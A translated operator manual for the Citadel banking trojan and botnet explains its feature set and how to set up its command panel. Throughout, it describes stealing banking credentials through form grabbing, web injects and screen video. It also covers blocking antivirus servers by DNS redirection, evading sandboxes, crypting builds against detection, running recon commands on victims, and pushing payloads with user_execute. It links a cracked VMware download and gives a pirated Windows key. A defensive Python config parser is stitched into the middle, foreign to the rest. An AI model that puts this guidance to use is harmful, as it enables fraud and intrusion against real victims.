Citadel Version 1.3.5.1 Rain Edition Manual

 
This is the translated manual for a dangerous Botnet/Trojan. Please handle with care.
 
Manual Version: 3.0 (last updated 03/10/2012)
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Table of contents:
1. Innovations
2. Access to the CRM and its description
3. Step-by-step installation of Citadel
a) Server requirements
b) Step 1 [Builder, permissions, scripts]
c) Step 2 [Additional admin-panel security]
d) Step 3 [Config parsing]
4. Installing the BackConnect Windows server (VNC module)
5. Installing the Citadel VNC admin interface
6. Installing the WebSocks checker (WebSocks)
7. Installing the log parser (WebParser)
8. Installing CardSwipe
9. Working with the crypt panel (Crypt Exe)
10. Installing the system proxy (relay host)
11. A brief tutorial on the new admin-panel features
12. Working with the API (api.php)
13. How to update the admin panel and the bot to the next Citadel version
14. Description of the options in the builder config
15. FTP iframer: description and setup
16. Description of the "Process keylogger" module
17. GeoIP botnet protection module
18. The "Double-log cleaner" module
19. Web injects module (WebInjects)
20. General recommendations and FAQ
21. How to ask questions in Jabber
22. License agreement and terms of use
23. List of bot commands
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
 
************************************************** ******************************
========================== >>>>> 1. List of Citadel features and innovations:
************************************************** ******************************
[+] Fixed the VNC bug on Vista / Windows 7. It is now possible to work with Internet Explorer 8 (recall that there was a rendering problem with IE).
[+] Support for Mozilla Firefox 7.0 (fixed the problem with reports not being sent from the latest browser versions).
[+] Crypto-protection (the body is decrypted in memory).
[+] DNS redirection (not via the hosts file). Any URL can be blocked or redirected without fear that heuristics will notice. For example, AV servers can be blocked, or a reworked bank page can be redirected to another host.
! BONUS! A list of URLs of popular anti-virus programs to block is attached.
[+] Software version information in reports. The detailed browser version of the holder is sent along with the report. This helps when imitating the holder's settings.
[+] An additional level of server protection from trackers: the Login Key.
[+] An authentication mechanism for config downloads (no direct URLs). Gives full protection from known trackers.
[+] Google Chrome grabber support [tested on the latest versions 15.x/16.x/17.x].
[+] Google Chrome inject support [tested on the latest versions 15.x/16.x/17.x].
[+] Added caching of search functions, which speeds up installation of the Chrome hooks.
[+] Added the ability to execute CMD system commands at bot start (the CMDList section), sending a report to the server. For example, on install, send the results of the command "ipconfig /all", or a list of all network shares. Useful for analysing the internal structure of companies (for example, bots in a LAN often have names like ACCOUNTANT_PC, POS_SERV, DATABASE ...).
[+] Added a mechanism to verify that the hooks are safe on some Windows versions.
[+] Heuristic analysis of the environment with a stop-list of unwanted software (significantly increases stealth), including all popular anti-virus software.
[+] Fixed some minor bugs.
[+] Video grabber. A unique opportunity to watch your injects at work "through the holder's eyes": the config file specifies a list of sites and the recording length in seconds, and when the holder visits a given link, video recording in .mkv format is activated. It is recommended to configure your server to receive files of 10-60 MB.
[+] Removed the deletion of cookies on install, since it breaks the "fingerprint" when working with the holder's transfers.
[+] Added support for HTTP 1.0 and extended headers (e.g. the response does not always look like "HTTP/1.1 200 OK"; it can be "HTTP/1.1 200 follow document", with more words after the 200 code). Applies to the Firefox and Chrome browsers.
[+] Added a gate generator (in case you want to put the files on an intermediate host for relaying).
[+] Completely redone encryption (data transmission, log/video recording, config download, etc.) in Citadel: the outdated RC4 used in Zeus was replaced with AES-128. Recall that RC4 caused a slip when decryptors for various Zeus configs/injects were mass-produced, and hosts started getting burned on abuse.ch.
Now, in addition to the built-in RC4 keyed with your personal signature in the software, with the embedded AES encryption the result is secure AES-128 bot <-> gate communication. No ZeusDecryptors (ThreatExpert) or automated reversing will hinder your comfortable work at the moment (Jan 2012).
[+] All the basic functions remaining from Zeus are present. There is no need to describe them again.
[+] Fixed a bug in recording reports for web filters marked with "!" (ignore) in the config file, which was supposed to exclude all the specified URLs but instead did the opposite and wrote them to the log.
[+] Added a new option to the config file filters, namely whether or not to send cookies to the server.
The static config option disable_cookies 0/1 indicates whether cookie grabbing is disabled (1 - disabled, 0 - enabled).
Cookies can also be obtained manually with the user_cookies_get command from the admin panel, if you really need them.
[+] Added a function to open any page in the default browser of the user on the bot.
For example, if you want to cheat a counter or voting statistics, or want extra income from your botnet by opening shop pages (also pharma, gambling, drop projects, etc.), this is a great way to advertise the required page!
New parameter: url_open <url>
[+] A new kind of WebFilters filtering in the build configuration file.
Two new parameters: P and G.
The P parameter placed before a link specifies recording only POST requests (all others are ignored) from that link.
The G parameter specifies recording only GET requests (all others are ignored) for the given link.
The parameters cannot be combined, i.e. specify only one of them.
[+] Added a modular software system, which gives us:
* Scalability and the ability to download any operational functionality for bots oriented to Citadel.
All modules are loaded from the server and dynamically decompressed in memory, eliminating detection.
Storage and transfer to the outside world happen only in encrypted form.
The modules are loaded into the target process, which saves a significant amount of memory.
Extensive administration: modules can be turned off through the config.
[+] Video grabber redone on a modular basis. The uncrypted build now weighs < 190 KB. Always.
[+] Added new option timer_modules (timings for loading modules).
[+] Added support for the new Google Chrome 17 browser and fixed a bug with Flash handling in it.
[+] Added support for macros. Introduced macros: %BOTID%, %BOTNET%
* Macros can be inserted into any part of the inject data, and on upload to your server (AZ / INJECT) the bot name and botnet name are transmitted.
[+] Added 4 commands to control modules (on/off, disable/enable download).
[+] Added new option disable_httpgrabber 1/0 for Chrome: disables conventional processing of HTTP (not HTTPS) requests.
[+] Added the full User-Agent record to HTTP(S) grabber reports, which allows the holder's UserAgent to be cloned through any CCTools-type utility.
[+] Added the screen resolution to HTTP(S) grabber reports, for example "Screen (w:h): 1600:900" - useful when cloning the holder's settings, since many banks pay attention to this.
[+] Changed the protocol for sending video files to reduce server load (some had problems with server load, and it was strongly slowed down).
[+] Added the ability to send Jabber notifications to multiple recipients in the Citadel admin panel.
[+] Added the ability to specify multiple url_config entries (the path to the main config file). Previously, if the main config was unavailable at the time the bot was installed, no backup was downloaded; now the bot tries to pull the config from the other URLs as well (up to 3 backups can be entered).
[+] Fixed a bug in Google Chrome (17.x) leading to a hang when opening multiple tabs with injects.
[+] Added new commands:
- Get information about the software installed on the computer (list: company | product | version): info_get_firewall
- Get information about the anti-virus installed on the computer: info_get_antivirus
- Get information about the firewall installed on the computer: info_get_firewall
The information comes as a separate report for each bot. Mass statistics of installed software will soon be embedded in the Citadel admin panel.
[+] An algorithm with a number of anti-emulation techniques against AV (without a crypter, the software became invisible to several proactive defences).
[+] Fixed a problem running under the SYSTEM user.
[+] Added Jabber notifications when bots matching a specified wildcard are detected (e.g. the mask *corporate* will look for BotIDs matching it); even if they have not sent any log files, the script will notify you in Jabber about the appearance of the bot. Now you will not miss bots of interest.
[+] The admin panel has a new section, "Efficacy and Safety": we integrated with the scan4you service, and you can now check all of your exe builds for detection with one click right in the Citadel admin panel. You can also set up automatic file scans several times a day, and if one of your files is detected by more than a third of the anti-virus engines, you will immediately receive a notification in your Jabber so you can
replace the exe at once. The mechanism now works for you automatically.
[+] Some customers complained that only 40% of bots updated to the new exe version, while the others could not upgrade for some unknown reason. Indeed, the bug remained from Zeus; we investigated and corrected it. There is now a new config parameter: timer_autoupdate 8
It sets how often (in hours) the exe is downloaded from the server and restarted (the RC4 key must be the same). 80% of bots now update successfully, and when re-uploading a crypted exe, survivability increased by 37.1%; your bots will always have a fresh, clean build.
[+] Reworked the system for sending reports to the server. In previous versions each report was sent in a separate POST request to the gate; in the new scheme reports are sent in packs of several at once, which minimises the number of sessions and the load on the server, so it can withstand a large number of bots online.
[+] The video format from bots changed to .webm (HTML5); we built an online video player into the Citadel admin panel, so you can now watch the video directly in your browser (Opera recommended). Features: fast rewind/forward, full screen, video search by BotID, IP address, date.
But this is not enough, and we went further. Many of you use (it is time for the whole industry to develop jointly) an AZ and a personal admin panel for injects, account collection, etc. Would you like to watch a transfer, or how your inject works on the bot, from your own admin panel? It's easy! We created an API system: you can now pass a BotID or IP address to the script, and the API will return ready-made HTML embed code for the video from that bot, which you can insert and watch anywhere, even on narod.ru, without entering the Citadel admin panel.
[+] Added a convenient analyser/parser of system commands (CMDList) in the admin panel; you can now see the results of executed system commands, such as ipconfig, the list of PCs in the local network, the list of processes, etc., in a new table format.
[+] Now, when a build is installed on a bot, the following information is sent to the admin panel in one go: installed firewalls, installed anti-virus software, installed programs.
You can view the information for a single bot or for the entire botnet. We created a separate section where you can see all the statistics in the form of visual graphs and calculations. Now you know what you are up against.
[+] Added "Favourite logs": you can mark any interesting account when searching data in the admin panel and then easily find it, since it will be highlighted in a different colour.
[+] Injects are now UTF-8 compatible (you can insert any language into an inject, such as Japanese, Chinese, etc.).
[+] Developed a crypt section in the Citadel admin panel. This section allows you to update the bots' exe file straight from the web. At any time you can re-upload the right exe file, and bots will download it in a timely manner. There is a download history in the format: File | Download date | Paid (Y/N)
On the latter point, we divided the privileges and created a separate user category, "crypter": these users have whatever access to your panel you wish, and their only privilege is the ability to update the exe file, which you can mark in the table as a paid crypt or not.
You can turn on Jabber notification of the scan4you check result.
[+] Added full-screen screenshots (config option "@@").
[+] Improved auto-update mechanism: if you encountered a problem with heavy server load during updates (or bots not moving to the new admin panel), this fix corrects that situation. The fix includes:
- Old reports from the previous version are removed during the exe upgrade (tmp file), as an additional safety net.
- Heavy records (video and other file reports) are also tested for correctness and removed in case of problems (for example, if the file was already downloaded).
- Changed the update initialisation, eliminating a deadlock and allowing further updates after a file-system error.
[+] Fixed the problem of garbage in the admin logs: removed logging of Flash movies (swf/flv) and of all of Facebook from the logs, because they generate a huge amount of trash.
[+] The "WebSocks quality inspection" module is now integrated into the admin panel, with no extra scripts. Shows: country, state, city, hostname, uptime and ping lag.
This section can be entered without a password, for convenience when a SOCKS is needed urgently.
[+] The "log parser" module is now integrated into the admin panel, with no extra scripts. The interface is much improved; added the ability to create "favourite domains" and "log archives", and the ability to parse http or https domains as chosen. Builds a visual table of all the domains that appear in the logs.
[+] Added "Notes" in the Citadel admin panel, a small online notebook. Adapted the admin interface for iPad / Galaxy Tab tablets.
[+] Improved the "VNC admin panel" module; it is now integrated directly into the Citadel admin panel, without any additional scripts. Everything is set up in 1 click. Many new features, namely:
- Ability to work with the API: you pass a BotID or IP address to the script, for example through an inject, and it sets up the VNC / BackConnect SOCKS connection, sending you the connection data via Jabber. The script can be called at any time; applies to AZ.
- In front of each report in "Search the database" there are now four buttons: "Add to Favourites", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC: with this option selected, the bot will establish a VNC connection each time it comes online, until you disable it.
- AutoConnect BC Socks: with this option enabled, the bot will establish a backconnect SOCKS connection each time it comes online; the other option creates a one-off connection.
- Ability to automatically create a VNC / BC SOCKS connection as soon as a bot logs in to an account matching the URL mask you want, hot off the press.
- Next to each account matching the URL mask, the date of the last login to that account is shown, so you no longer need to check accounts for activity; the scripts do it for you.
- The possibility of sending any notices to several Jabber accounts at once.
[+] Fixed a problem with hook chaining in Chrome.
[+] When user_execute is started with the "-f" flag, it is forced to operate only as an exe auto-update and will not run as an installer.
[+] Optimised the gate, reducing load. Simplified the admin panel installer, which allows all modules to be installed in 1 click.
[+] Added support for the new Chrome 18 [inject / formgrabbing].
[+] Added the "All bot reports" button in the admin panel; you can view the reporting from start to end for a specific bot.
[+] Fixed a bug with the manual command dns_filter_add; URL blocking now works correctly.
[+] Fixed a bug with the display of exe files on the main page; deleted exes now disappear automatically.
[+] Fixed a bug in the scan4you task scheduler; the daily exe file check now works correctly.
[+] Added a single CRON job; one cron job now manages all tasks: Jabber notices, file inspection, modules, etc.
[+] Added the ability to delete videos from the admin panel.
[+] Added a link to the bot in the notes of the VNC-Jabber module.
[+] Updated GeoIP database (end of 2011).
[+] The last domain in AdvancedConfigs is triggered with a delay; this is meant to protect your backup URLs from automatic grabbing by honeypots.
[+] Fixed the script for zipping archive data in the admin panel (fsarc.php).
[+] The Jabber account settings and all other settings are now in the general settings.
[+] You can now specify the config file path with https:// (unsigned certificates are supported).
[+] Fixed a case-sensitivity bug in injects; now <BODY> and <body> are the same entity. All injects are case-insensitive.
[+] Completely changed the web admin interface; it is now user-friendly.
[+] Added online viewing of screenshots from the admin panel. Screens are lined up in order of appearance, sorted, with easy switching back and forth by keys. There is no longer any need to download all the images and look for one. Virtual keyboards/pages are shown consistently.
[+] Added check-in history; you can see the check-in statistics of your botnet (active, total, percentage) for a week, two weeks or a month.
[+] Added a software version history; you can view the update statistics in your Citadel botnet. You will know how many bots moved to the new version and how many remain on the old one. A diagram is drawn.
[+] Ability to search logs only for bots that are online.
[+] Ability to search logs for several keywords at once; you can save them as an alias and not enter them again at the next search, just select from the list.
[+] Added the "Cookies" button in the context menu for bots, which quickly displays all of the bot's cookies, if you have not turned them off. Saves time.
[+] Integrated an FTP-account export function into the API, useful if you are using third-party FTP-iframer class software; allows FTP accounts for the desired date to be output in plain-text/xml/php format.
[+] Added the "Whois" button in the report view, which gets all the information on the report's IP address in one click.
[+] Added the comment on the bot to the report view, as well as the time when the bot was last online.
[+] New section "Selected records", which lets you save a quick link to the required report plus a comment on it. For example, if you come across an interesting account, click "Add to Favourites" and the report will be displayed in a separate section, with automatic Whois data and your comment. Keep accounts in one place.
[+] Added an anti-emulator that protects your botnet from reversing and from falling into trackers. On start, the build detects whether it is running in a virtual machine or sandbox (CWSandbox, VMware, VirtualBox, Sandbox); if so, it behaves differently and your botnet goes unnoticed. Details are not disclosed, since this announcement is public and the technique is very tricky.
Downside: you cannot test it in VMware; you have to do it on a real PC or dedicated server. The option is in the config: antiemulation_enable 0/1
[+] Added display of the bot's "Online / Offline" status in the report view.
[+] One of the most important features: report preview when searching logs. No need to open 200 more browser windows to view each report and each link. You can now click one report to preview it, and if the report is of interest, view the full version.
Rapid switching between reports with the back/forward keys and ESC is supported.
[+] Updated the cronjob script for cleanup of old scripts (commands). Now everything works without bugs.
[+] Added the context menu option "Bot screenshots".
[+] VNC admin module: added sorting by date of last connection / OS (for example, if you only need WinXP).
[+] Log parser module: added sorting by domain / number of reports in descending order.
[+] FTP iframer module: fixed a bug with "smart" iframing when quotes in the iframe code were escaped. Current owners are advised to re-upload the script to the relay host.
[+] Since the previous encryption algorithm was cracked after a few months, and because of this some customers got into ZeusTracker, we developed and implemented a new encryption algorithm based on a modified RC4. The router uses a special key known only to the client, which is required to decrypt. Because each client has their own individual key, the others will no longer suffer because of one client: if one is hit, the others are protected. We are now completely isolated from automatic analysis of builds. As a result, we obtain level-2 authorisation protection of the bot from trackers.
[+] Added stripping of the X-Frame-Options header, since it can interfere with the work of some injects.
[+] Did a lot of work to correct formgrabbing / injecting in Chrome 19 (19.0.1084.52m).
[+] The admin interface and gate work faster on large botnets thanks to functional optimisation of the GeoIP database.
[+] Made a quick check of bot online status in the list on the main page.
[+] Ability to add a bot to "Favourites" without a report.
[+] Made detection of the privileges in the system (admin / user); displayed in "Bot information - Flags".
[+] Sort screenshots by date.
[+] Added the ability to connect to other Citadel databases (both remote and old/disabled admin panels) to search for reports.
[+] Extended search in the database: you can specify stop words, such as twitter.com, which will be excluded from the results so as not to clutter the logs with debris. Also, you can search not through the report content but by URL mask, which increases the speed of data retrieval.
[+] Extended the Jabber notifier; added the following events:
- BotID masks for the "Bot came online" event
- Notification when a specific program appears in "installed software"
- Mask on CMD report contents.
- Parallel convenient entry of all events in a log file, in addition to Jabber notifications.
[+] Added a free module for grabbing cookies in Firefox; exports all cookies from the browser and sends them to you.
[+] Fixed a bug deleting records.
[+] Auto-update of statistics on the home page.
[+] [Decode] button on reports, which decodes urlencoded sequences (%0D) into a convenient form.
[+] Added the ability to determine the bot's online/offline status in the API.
[+] Completely redesigned the algorithm for testing the WebSocks module.
[+] Show scripts (commands) page by page.
[+] Added the ability to send messages to Jabber through api.php (uses your personal settings in the admin panel).
[+] Now cookies (Firefox / IE) and headers are added to each HTTP / HTTPS report.
[+] Completely redesigned the internal encryption algorithm; check-in reliability is many times higher and durability longer. To migrate to the new bot version, run the command user_execute http://www.host.com/1351.exe. The RC4 key must be the same.
[+] Adjusted the browser keylogger. A space is automatically added if 5 seconds have passed since the last key press; this is needed to visually separate input fields.
[+] Fixed trouble with 302 redirects, when an inject did not work if the items were linked via JavaScript.
[+] Plaintext logs open in a new tab.
[+] Fixed a bug where bots were lost from the online list when using GeoIP.
[+] Display the comment on the bot in the VNC module on mouse-over, as well as sending the comment to Jabber together with the connection notice.
[+] Ability to specify masks with an asterisk (*) in DnsFilters, making masks more flexible.
[+] WebInjects. The module is designed for easy interaction with holders through the technology of injects into browsers. The module allows you to push an inject to any specific BotID, country or botnet in just a few minutes, without having to edit the config. Everything works through the admin panel.
A brief educational program:
In the DynamicConfig section of the bot config, add the parameter url_webinjects "http://www.host.com/file.php" (the path to file.php). The bot pulls this file every 2 minutes, receiving the pack of injects that the inject distribution system issues.
Section 2, WebInjects, has two subsections: "Webinject groups" and "Packs". The first has the structure "Group - INJECT - Members (admitted to the group)" and is responsible for managing all injects. The second section is responsible for configuring the spread of injects (which bots receive the inject and how many).
In the main menu, in the "Users" section, create a new user with the right "r_botnet_webinjects_coder"; this is a user who can manage the group that the administrator assigns. In other words, if you create an account in the admin panel for an inject developer, they will have the right to create and edit their own injects; they do not see other injects, only the list of injects of their own group. I.e., you can create 5 groups and 5 inject coders, so each person is responsible for their own group (set of injects). You see the statistics of what happens in the overall system and can unite all groups' injects into one "pack", which will be pushed to any and all bots, or to a single category of bots by class: country or botnet.
A special easy visual editor with inject syntax highlighting was created in the admin panel. The format is fully compatible with the Zeus format.
There are several modes for packs:
Dual - when both the inject file from the main config and the webinjects are active.
Single - when only the webinjects are active and the local inject file is off.
Disabled - when the webinjects are disabled and the local inject file works.
If by chance there is a mistake somewhere in an inject, the webinjects are not assembled and you receive a DEBUG report with information on which pack (bundle) was not assembled.
In the information on the bot you can see the history of webinject tests; you can also look at the bot's DEBUG reports and view the history and compilation errors of the webinjects.
If the bot receives several packs (bundles) with different modes of operation (dual, single, disabled), the "narrowest" mode of all the bundles is automatically selected, such as single.
The bot constantly checks for updates to any of the webinjects and, if there are any, updates them for itself.
[+] The config option disable_httpgrabber is extended to completely get rid of HTTP reports, sending only HTTPS reports to the server for all browsers when set to "1". Gets rid of unnecessary server load.
[+] Added the "HttpVipUrls" section in WebFilters, which lets you add exception links (http://) when HTTP grabbing is disabled (disable_httpgrabber 1).
-------------------------------------------------- --------------------------
To simplify navigation, you can skip the sections
that describe the installation and use of modules you have not acquired.
Use CTRL + F to search for keywords and definitions.
-------------------------------------------------- --------------------------
************************************************** ******************************
========================== >>>>> 2. Access to the CRM and its description
************************************************** ******************************
We provide personal account details via Jabber.
What is the Citadel CRM Store?
It is the system of interaction between our clients and the developer.
Perhaps you know the situation when a product's support ignores your requests in ICQ / Jabber; this is due to the high load on the person responsible for it, because there are many clients and he is alone, and also busy with chores.
Especially for you, we developed a system through which you can immediately report a bug in the software, and we in turn will fix it, if there is one. All requests go to several people at the same time, with notifications via Jabber / SMS. You quickly get an answer within the ticket system.
If you have a great idea for improving the software and want to share it with the developer (even the smallest idea: for example, you do not like the log format), we will accommodate you.
You can create two types of requests (read: projects) within the CRM:
a) public request - a request with a subject + description (better to attach a spec), which all customers will see; they can discuss it in the comments, suggest a price for the sale, and vote on whether to implement the request or send it to the trash.
You can create these types of requests, and can vote and take any action in relation to other clients' requests.
b) private request - if you want to offer our developers an individual task and a good price for its implementation, this type of request is for you. Only the developers (i.e. us) and you can see it. If both sides agree on all conditions, only you get this module.
All current requests can be seen in the section labelled 'discussion'.
 
The vote has 4 values:
- Needed, I will buy it
- Useful, but I do not need it
- Absolutely not needed
- I do not need it, I will not buy it
If you see a new request, vote on it, even if you do not need it at all! We have a very narrow audience, so it is YOUR opinion that makes the difference for ALL; do not stay on the sidelines.
You will be notified of any developments within the CRM (solutions, requests, comments) through the Jabber bot channel. This is done for your convenience, so you do not have to refresh the page every time. But you still need to enter the CRM to follow the news and requests and to state your opinion.
The faster the flow of votes and opinions, the faster the product evolves.
If a request gathers many rejecting votes, it goes to "Rejected" and is closed.
If a request is approved by the developers, it goes to "Under Construction" and we estimate the approximate timing of its implementation.
Be sure to specify the desired price per module for which you would value the improvement.
We publish all news in the "News" section; if you do not receive notifications in Jabber, please report it immediately to our support, since you are depriving yourself of a great deal!
Come in and check the CRM news and the comments on requests often.
A list of useful links that will help you:
1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:
http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe
2) Image of the English-language Windows XP SP3 (Corporate Edition):
http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso
Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG
3) Development kit for creating injects + examples (author unknown, taken from the forums):
http://www.citadelmovement.com/software/injects_development.zip
 
 
************************************************** ******************************
========================== >>>>> 3. Step-by-step installation of Citadel
************************************************** ******************************
Installing Citadel
Folders:
builder - the builder kit
backconnect - software for the BackConnect VNC module, namely the PHP scripts for the BackConnect Windows server (see below).
webserver (or server [php]) - the admin panel; this is what gets uploaded to the server.
webserver/cp.php - admin panel management file
webserver/gate.php - the main gate for communicating with the bot
webserver/file.php - script that issues the config and the bot exe files.
********************
>>>>>>>>>> A) Requirements for the server.
********************
PHP > 5.3, MySQL 5 (preferably the latest version, but 5.2 works too). The curl module for PHP is required.
cron, Apache. Optionally nginx and a control panel such as cPanel or DirectAdmin.
+ a Windows VPS if you purchased the VNC admin module (see the module below): Windows 2008/2003/7 with 512 MB RAM and 2 GB of disk space, and a 1024 MHz processor.
 
********************
>>>>>>>>>> B) Step 1 [Builder, right, scripts]
********************
When you start builder.exe, a line appears:
Authorization key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
This is your individual key that protects against trackers (we also call it the LOGIN KEY).
It needs to be placed in the file webserver/system/global.php, which contains the line
define('BO_LOGIN_KEY', 'PUT_KEY_HERE');
Insert the key here, so that it becomes
define('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
By default this key is already written into the admin panel, so you only have to check it.
Upload the scripts from the webserver folder to the server and set the permissions according to the scheme below:
Then set chmod 777 on the folders:
system
system/data
system/cron
files/
files/webinjects
Also, before installing, set chmod 777 on the entire webserver folder; after the installation is complete, return the folder permissions to chmod 755.
After this is done, open the file webserver/api.php
and change the line define('API_TOKEN_KEY', 'JHGuw3e76&^%&$gf232ghfgh%^$%^$%');
to any arbitrary password, e.g. define('API_TOKEN_KEY', 'dgwd23gwegw');
This is necessary so that you are protected from hacking and are not compromised through the API script; change the default password.
Also, for security reasons, it makes sense to rename the scripts cp.php (the admin panel management file) and gate.php (the gateway).
Do not rename file.php!
********************
>>>>>>>>>> C) Step 2 [Additional security admin]
********************
Go to http://www.htaccesstools.com/htpasswd-generator/
Enter the desired name and password; it outputs a line like a:$apr1$HE/llFvK$u3YAEGm277SkotywpTl9w/
Save this line in a .htpasswd file in the webserver directory.
After that, create a new .htaccess file in the webserver directory
and write in it:
<Files cp.php>
AuthName "Your ID"
AuthType Basic
AuthUserFile /path/to/file/.htpasswd
require valid-user
</Files>
where /path/to/file/.htpasswd is replaced by the full Unix path. If you renamed cp.php in step 1, use the new name in the <Files> directive.
Now when entering the admin panel cp.php there is additional protection by a login and password pair.
You can do it differently: do not create .htpasswd, just create the .htaccess file and write these lines in it:
<Files cp.php>
Order Deny,Allow
Deny from all
Allow from 111.111.106.111
</Files>
where 111.111.106.111 is your permanent IP; now the admin panel will be available only from your IP.
Which method you prefer is up to you.
********************
>>>>>>>>>> D) Step 3 [Parsing config]
********************
Open the file config.txt and look at the new settings; the old settings inherited from Zeus remain unchanged, so we will not dwell on them. If you have not used Zeus before, download the public Zeus releases and study the settings yourself. The product is aimed at those who used Zeus before.
entry "Video"
quality 1
length 60
end
Section for configuring the video grabber: length is the length of each video in seconds; you should use no more than 10 minutes (600 seconds), since otherwise very hefty files are produced.
quality - from 1 to 5, the video quality. It is recommended to leave the default of 1 to save on the size of the video files.
Video recording is triggered when the desired link is entered, and exactly length seconds are recorded.
The mask for recording is set in the entry "WebFilters" section:
"#*paypal.com/*"

The # symbol in front of the mask activates recording.

Use this section very sparingly, because the files put a rather heavy load on the server; specify a precise mask and only for the links you really need (for example, bank accounts).
It is recommended to configure the Apache and PHP server to accept files over 50 MB via POST.
A guide to setting up the server is here: http://jdownloads.ru/faq/8-how-uploadbigfiles.html
Test the video recording carefully on something other than virtual machines, since for lack of proper support it can happen that a virtual machine will not record video.
Videos are saved in .webm format in the folder _reports/*BOTNAME*/videos/
They can be found through the file search in the admin panel or viewed in the online player ("View Video"). It is recommended to view them in Opera or Firefox; other browsers have not been tested.
entry "CmdList"
"hostname"
"net view"
"ipconfig /all"
end

A list of system commands that the bot executes on its first run on the system and sends to the admin panel.
In the admin panel you can find the results by searching for the report type "Result of CMD command".
With it you get the list: bot - result of the command
in a convenient format (section CMD parser).
encryption_key "key"
Be sure to set a random key here; this key is also known as the RC4 encryption key. You enter it when installing the admin panel with the installer, and you can change it in Settings. It should be neither too complex nor too simple, and it must be the same in the config file and in the admin panel. Using fewer than 10 characters is not recommended! Use ONLY lowercase characters and special characters!
 
entry "DnsFilters"
"microsoft.com=127.0.0.1"
"myspace.com=127.0.0.1"
"gruposantander.es=127.0.0.1"
end
Allows creating a DNS redirect, or blocking an AV server or an unwanted URL (for example, if you find that someone else is downloading your logs and you want to block their gate).
The IP address for the redirect is specified after the equals sign.
DNS redirection works not only for browsers but for all software that contacts the given domain. All such requests will be redirected to the other IP.
The mask can be specified exactly, or an asterisk (*) can be used for an approximate mask, for example:
entry "DnsFilters"
"*bitdefender.com*=209.85.229.104"
"*download.bitdefender.com*=209.85.229.104"
end
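An added example (not Citadel's own code) for an analyst handling a recovered plaintext config in the entry/end syntax described above: it parses the blocks and pulls out the DnsFilters redirects (which hosts, typically AV servers, a bot would sinkhole and where to) and the WebFilters masks with their @/@@/# capture mode. The sample config is constructed, and matching the masks as shell-style globs is my assumption.

```python
"""Parse the plaintext builder-config syntax described above (entry "Name" ...
end blocks plus bare `key value` lines) and extract the DNS redirects and the
URL masks that trigger capture.  Added example, not Citadel's own code."""
import fnmatch
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in the manual's syntax; not a real recovered config.
SAMPLE_CONFIG = """
url_server "http://localhost/gate.php"
entry "Video"
quality 1
length 60
end
entry "DnsFilters"
"microsoft.com=127.0.0.1"
*bitdefender.com*=209.85.229.104
end
entry "WebFilters"
"#*paypal.com/*"
"@@*bank.example/*"
"@*mail.example/*"
"*plainlog.example/*"
end
"""

_ENTRY_RE = re.compile(r'^entry\s+"?([A-Za-z0-9_]+)"?\s*$')
# Prefix -> capture mode, per the WebFilters description; "@@" before "@".
_CAPTURE_PREFIXES = (("@@", "screenshot-fullscreen"), ("@", "screenshot"), ("#", "video"))


def _unquote(s: str) -> str:
    s = s.strip()
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s


def parse_config(text: str) -> Dict[str, dict]:
    """Return {"scalars": {key: value}, "sections": {name: [lines]}}; section
    lines keep their order with surrounding quotes stripped (the manual shows
    both quoted and unquoted forms)."""
    scalars: Dict[str, str] = {}
    sections: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):  # blank or Zeus-style comment
            continue
        m = _ENTRY_RE.match(line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
        elif line == "end":
            current = None
        elif current is not None:
            sections[current].append(_unquote(line))
        else:
            key, _, value = line.partition(" ")
            scalars[key] = _unquote(value)
    return {"scalars": scalars, "sections": sections}


def dns_filters(cfg: dict) -> List[Tuple[str, str]]:
    """(hostname mask, redirect IP) pairs from the DnsFilters section."""
    pairs = []
    for line in cfg["sections"].get("DnsFilters", []):
        mask, sep, ip = line.partition("=")
        if sep:
            pairs.append((mask.strip().lower(), ip.strip()))
    return pairs


def dns_redirect_for(cfg: dict, hostname: str) -> Optional[str]:
    """IP a bot running this config would redirect `hostname` to, or None.
    Masks are matched as globs (assumption: '*' is the only wildcard)."""
    host = hostname.lower()
    for mask, ip in dns_filters(cfg):
        if fnmatch.fnmatchcase(host, mask):
            return ip
    return None


def capture_masks(cfg: dict) -> List[Tuple[str, str]]:
    """(URL mask, mode) per WebFilters line; 'log' when there is no prefix."""
    result = []
    for line in cfg["sections"].get("WebFilters", []):
        mode, mask = "log", line
        for prefix, name in _CAPTURE_PREFIXES:
            if line.startswith(prefix):
                mode, mask = name, line[len(prefix):]
                break
        result.append((mask.lower(), mode))
    return result


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print(dns_filters(cfg), capture_masks(cfg))
    print(dns_redirect_for(cfg, "download.bitdefender.com"))
```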
Once you have edited the configuration to your settings, click the buttons "Build config", "Build bot" and "Build modules".
The "Build bot" button is responsible for generating the exe file and reads the StaticConfig section.
The "Build config" button is responsible for generating the config file with the injects, and reads the DynamicConfig section.
The "Build modules" button creates the video module file and the Firefox cookie grabber module file.
Modules such as MiniAV and CardSwipe are built into the exe file and do not create any additional files.
Upload all the resulting files to the directory webserver/files
Do not forget to crypt the exe file before putting it in the folder, otherwise it can happen that on the auto-update timer the bots download a detected exe.
Uploading the video module is mandatory, even if you are not using it. You may skip uploading the exe file if you do not want the exe to auto-update via the timer_autoupdate parameter.
